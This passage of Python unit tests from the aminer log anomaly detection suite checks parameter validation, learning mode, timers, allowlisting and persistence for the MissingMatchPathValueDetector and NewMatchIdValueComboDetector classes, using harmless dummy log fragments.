self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], ["default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], None) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], "") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], b"Default") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], True) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], 123) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], 123.3) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], {"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], ()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], set()) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=-1) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=0) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=b"Default") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval="123") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=["Default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=[]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=100) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, default_interval=100.22) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=-1) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=0) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=b"Default") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval="123") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=["Default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=[]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=100) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, realert_interval=100.22) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=None) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=b"True") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values="True") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=123) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=123.22) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=["Default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=[]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], combine_values=True) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=set()) MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/NewMatchIdValueComboDetectorTest.py000066400000000000000000000716411500476301700324600ustar00rootroot00000000000000import time from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD from datetime import datetime class NewMatchIdValueComboDetectorTest(TestBase): """Unittests for the NewMatchIdValueComboDetector.""" match_context = DummyMatchContext(b" pid=25537 uid=2") fdme1 = DummyFixedDataModelElement("s1", b" pid=") fdme2 = DummyFixedDataModelElement("d1", b"25537") seq1 = DummySequenceModelElement("seq", [fdme1, fdme2]) match_element1 = seq1.get_match_element("", match_context) match_context = DummyMatchContext(b"ddd 25538ddd 25539") fdme3 = DummyFixedDataModelElement("s1", b"ddd ") fdme4 = DummyFixedDataModelElement("d1", b"25538") fdme5 = DummyFixedDataModelElement("d1", b"25539") seq2 = DummySequenceModelElement("seq", [fdme3, fdme4]) match_element2 = seq2.get_match_element("", match_context) seq3 = DummySequenceModelElement("seq", [fdme3, fdme5]) match_element3 = seq3.get_match_element("", match_context) def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ expected_string = '%s New value combination(s) detected\n%s: "None" (%d lines)\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" # learn_mode = True nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], ["/seq/d1"], 120, learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmivcd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, nmivcd) log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, nmivcd) self.assertTrue(nmivcd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(datetime_format_string), nmivcd.__class__.__name__, 1, "{'/seq/s1': ' pid=', '/seq/d1': '25537'}")) self.reset_output_stream() # repeating should NOT produce the same result self.assertTrue(nmivcd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # learn_mode = False nmivcd.learn_mode = False self.assertTrue(nmivcd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(datetime_format_string), nmivcd.__class__.__name__, 1, "{'/seq/s1': 'ddd ', '/seq/d1': '25538'}")) self.reset_output_stream() # repeating should produce the same result self.assertTrue(nmivcd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(datetime_format_string), nmivcd.__class__.__name__, 1, "{'/seq/s1': 'ddd ', '/seq/d1': '25538'}")) self.reset_output_stream() # allow_missing_values_flag=True nmivcd.allow_missing_values_flag = True self.assertTrue(nmivcd.receive_atom(log_atom3)) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(datetime_format_string), nmivcd.__class__.__name__, 1, "{'/seq/s1': 'ddd ', '/seq/d1': '25539'}")) # stop_learning_time nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], ["/seq/d1"], 120, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(nmivcd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(nmivcd.receive_atom(log_atom1)) self.assertTrue(nmivcd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(nmivcd.receive_atom(log_atom1)) self.assertFalse(nmivcd.learn_mode) # stop_learning_no_anomaly_time nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], ["/seq/d1"], 120, learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(nmivcd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(nmivcd.receive_atom(log_atom1)) self.assertTrue(nmivcd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(nmivcd.receive_atom(log_atom2)) self.assertTrue(nmivcd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(nmivcd.receive_atom(log_atom1)) self.assertTrue(nmivcd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(nmivcd.receive_atom(log_atom1)) self.assertFalse(nmivcd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ["path/id"], 120, learn_mode=True, output_logline=False) t = time.time() nmivcd.next_persist_time = t + 400 self.assertEqual(nmivcd.do_timer(t + 200), 200) self.assertEqual(nmivcd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(nmivcd.do_timer(t + 999), 1) self.assertEqual(nmivcd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], ["/seq/d1"], 100, learn_mode=True, output_logline=False) t = round(time.time(), 3) analysis = "Analysis.%s" value = "value" value2 = "2" log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmivcd) nmivcd.receive_atom(log_atom1) self.assertRaises(Exception, nmivcd.allowlist_event, analysis % "NewMatchPathDetector", self.output_stream.getvalue(), None) # The NewMatchPathValueComboDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, nmivcd.allowlist_event, analysis % nmivcd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(nmivcd.allowlist_event(analysis % nmivcd.__class__.__name__, {"/seq/s1": value, "/seq/d1": value2}, None), "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", {"/seq/s1": value, "/seq/d1": value2})) self.assertEqual(nmivcd.known_values, [{"/seq/s1": " pid=", "/seq/d1": "25537"}, {"/seq/s1": value, "/seq/d1": value2}]) self.assertRaises(TypeError, nmivcd.allowlist_event, analysis % nmivcd.__class__.__name__, {"/seq/s1": None, "/seq/d1": value2}, None) self.assertRaises(TypeError, nmivcd.allowlist_event, analysis % nmivcd.__class__.__name__, {"/seq/d1": value2}, None) self.assertRaises(TypeError, nmivcd.allowlist_event, analysis % nmivcd.__class__.__name__, {"/seq/s2": value, "/seq/d1": value2}, None) # allow_missing_values_flag = True nmivcd.allow_missing_values_flag = True self.assertEqual(nmivcd.allowlist_event(analysis % nmivcd.__class__.__name__, {"/seq/s1": None, "/seq/d1": value2}, None), "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", {"/seq/s1": None, "/seq/d1": value2})) self.assertEqual(nmivcd.known_values, [{"/seq/s1": " pid=", "/seq/d1": "25537"}, {"/seq/s1": value, "/seq/d1": value2}, {"/seq/s1": None, "/seq/d1": value2}]) def test4persistence(self): """Test the do_persist and load_persistence_data methods.""" nmivcd = NewMatchIdValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], ["/seq/d1"], 100, learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmivcd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, nmivcd) self.assertTrue(nmivcd.receive_atom(log_atom1)) self.assertTrue(nmivcd.receive_atom(log_atom2)) self.assertEqual(nmivcd.known_values, [{"/seq/d1": "25537", "/seq/s1": " pid="}, {"/seq/d1": "25538", "/seq/s1": "ddd "}]) nmivcd.do_persist() with open(nmivcd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[{"string:/seq/s1": "string: pid=", "string:/seq/d1": "string:25537"}, {"string:/seq/s1": "string:ddd ", "string:/seq/d1": "string:25538"}]') nmivcd.known_values = [] nmivcd.load_persistence_data() self.assertEqual(nmivcd.known_values, [{"/seq/d1": "25537", "/seq/s1": " pid="}, {"/seq/d1": "25538", "/seq/s1": "ddd "}]) other = NewMatchIdValueComboDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], ["/seq/s1/id", "/seq/d1/id"], 100) self.assertEqual(nmivcd.known_values, other.known_values) def test5validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" ids = ["path/id"] self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, [""], [self.stream_printer_event_handler], ids, 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, [], [self.stream_printer_event_handler], ids, 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, None, [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, "", [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, True, [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, 123, [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, (), [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, set(), [self.stream_printer_event_handler], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], ["default"], ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], None, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], "", ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], b"Default", ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], True, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], 123, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], 123.3, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], {"id": "Default"}, ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], (), ids, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], set(), ids, 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], [""], 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], [], 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], None, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], "", 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], b"Default", 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], True, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], 123, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], 123.3, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], {"id": "Default"}, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], (), 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], set(), 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 0) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, -1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, ["default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, None) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, "") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, b"default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, {"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, ()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 0.1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id="") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=None) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=b"Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 